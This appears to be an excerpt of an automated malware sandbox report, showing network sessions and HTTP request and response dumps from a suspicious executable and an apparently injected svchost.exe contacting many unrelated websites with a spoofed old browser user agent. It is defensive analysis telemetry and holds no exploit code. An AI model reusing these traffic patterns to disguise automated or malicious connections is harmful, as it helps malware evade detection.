                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC568INData Raw: 31 65 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78
                                                                                                                                                                                                                                                                        Data Ascii: 1ea7<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots" content="noindex
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC568INData Raw: 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 20 68 31 22 3e 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: device-width,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="zone-name-title h1">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC570INData Raw: 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 76 4f 4e 68 78 62 56 34 75 46 75 65 44 54 4d 4c 69 4c 76 36 30 53 45 4f 33 6c 72 7a 5f 47 52 42 7a 44 53 64 72 4e 33 69 79 77 55 2d 31 36 37 38 34 33 31 33 37 36 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 64 22 20 76 61 6c 75 65 3d 22 5a 30 70 4c 45 76 70 57 74 2e 54 2e 58 6c 62 58 79 57 45 4e 74 4c 36 37 58 42 49 62 4e 4b 43 69 54 52 59 51 57 5a 77 7a 48 73 30 2d 31 36 37
                                                                                                                                                                                                                                                                        Data Ascii: orm" action="/?__cf_chl_f_tk=vONhxbV4uFueDTMLiLv60SEO3lrz_GRBzDSdrN3iywU-1678431376-0-gaNycGzNCPs" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="md" value="Z0pLEvpWt.T.XlbXyWENtL67XBIbNKCiTRYQWZwzHs0-167
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC571INData Raw: 64 48 72 4c 64 70 6e 2d 67 4d 41 72 57 61 70 4d 57 41 4e 56 48 57 6b 34 52 6a 59 4a 61 43 44 37 30 2d 39 41 54 30 65 51 61 5f 58 5f 62 74 51 31 4d 34 39 38 44 4e 6c 51 4a 44 55 44 4c 78 76 54 64 56 76 54 68 51 30 7a 7a 4c 34 4a 57 51 74 43 33 54 57 38 45 35 52 48 77 33 74 68 4a 6f 73 67 52 4d 31 69 78 4f 6c 2d 39 76 6d 38 46 47 72 30 7a 48 63 4b 7a 4a 67 79 74 55 64 4e 74 7a 4e 69 77 6a 6a 75 47 30 67 62 36 75 47 45 6f 41 48 38 73 47 75 30 58 45 65 59 30 53 6a 63 46 36 71 67 47 66 5f 6c 6e 76 4b 73 4d 30 57 75 41 39 56 57 57 49 41 77 49 4d 35 33 57 38 51 35 79 36 71 47 33 59 57 62 37 4c 48 64 76 73 30 59 71 70 53 4f 32 32 48 32 44 50 4f 65 6c 4e 51 45 70 61 74 6b 41 63 6e 6f 66 53 33 42 66 44 57 55 31 74 6b 6a 56 72 68 6c 69 33 5f 43 51 52 78 76 54 38 7a
                                                                                                                                                                                                                                                                        Data Ascii: dHrLdpn-gMArWapMWANVHWk4RjYJaCD70-9AT0eQa_X_btQ1M498DNlQJDUDLxvTdVvThQ0zzL4JWQtC3TW8E5RHw3thJosgRM1ixOl-9vm8FGr0zHcKzJgytUdNtzNiwjjuG0gb6uGEoAH8sGu0XEeY0SjcF6qgGf_lnvKsM0WuA9VWWIAwIM53W8Q5y6qG3YWb7LHdvs0YqpSO22H2DPOelNQEpatkAcnofS3BfDWU1tkjVrhli3_CQRxvT8z
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC572INData Raw: 61 38 32 34 31 62 66 64 33 36 30 65 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 64 36 37 65 32 65 39 35 62 66 33 37 36 30 63 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 76 4f 4e 68 78 62 56 34 75 46 75 65 44 54 4d 4c 69 4c 76 36 30 53 45 4f 33 6c 72 7a 5f 47 52 42 7a 44 53 64 72 4e 33 69 79 77 55 2d 31 36 37 38 34 33 31 33 37 36 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 27 67 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 27 31 30 30 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4d 54 69 6d 65 4d 73 3a 20 27 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63
                                                                                                                                                                                                                                                                        Data Ascii: a8241bfd360e', cHash: 'd67e2e95bf3760c', cUPMDTk: "\/?__cf_chl_tk=vONhxbV4uFueDTMLiLv60SEO3lrz_GRBzDSdrN3iywU-1678431376-0-gaNycGzNCPs", cFPWv: 'g', cTTimeMs: '1000', cMTimeMs: '0', c
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC574INData Raw: 66 36 67 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 71 6c 49 32 47 51 51 6b 5a 46 78 35 50 48 52 4d 32 4c 30 72 57 67 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 4d 64 5a 72 36 61 5a 51 52 73 51 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 3a 20 27 6a 57 32 78 52 42 73 71 57 31 76 4c 74 75 42 6f 6f 58 39 61 4b 6d 45 44 32 63 5a 68 41 4c 37 73 6b 44 59 49 30 4d 48 64 72 6c
                                                                                                                                                                                                                                                                        Data Ascii: f6g==', i2: 'qlI2GQQkZFx5PHRM2L0rWg==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44WMdZr6aZQRsQ=', hh: 'jW2xRBsqW1vLtuBooX9aKmED2cZhAL7skDYI0MHdrl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC575INData Raw: 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66 6f 22 3e 0a 20 20 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild(cpo); }());</script> <div class="footer" role="contentinfo">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC576INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        38192.168.2.654486185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC577OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC588INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC588INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        39192.168.2.65401449.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC613OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        4192.168.2.6503285.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC2INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:55:59 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 51841
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC2INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC18INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                        Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC34INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC50INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                        Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        40192.168.2.654616138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC613OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC627INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC627INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        41192.168.2.654830188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC660OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: sigtoa.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC660INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LhLuC6al%2BeVwwPYfO93iBpdpcjhu972opCrJIXtoyCRjqoJLA7vbtIHOREl8lDSDoiqWectkAbC8M5YVDDc8lw2w%2FI3A182UayP8AvatuaxwYc%2FerJfWEaFJ8wPR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8267dd69a35-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC661INData Raw: 31 65 62 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78
                                                                                                                                                                                                                                                                        Data Ascii: 1eba<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots" content="noindex
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC662INData Raw: 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 20 68 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c
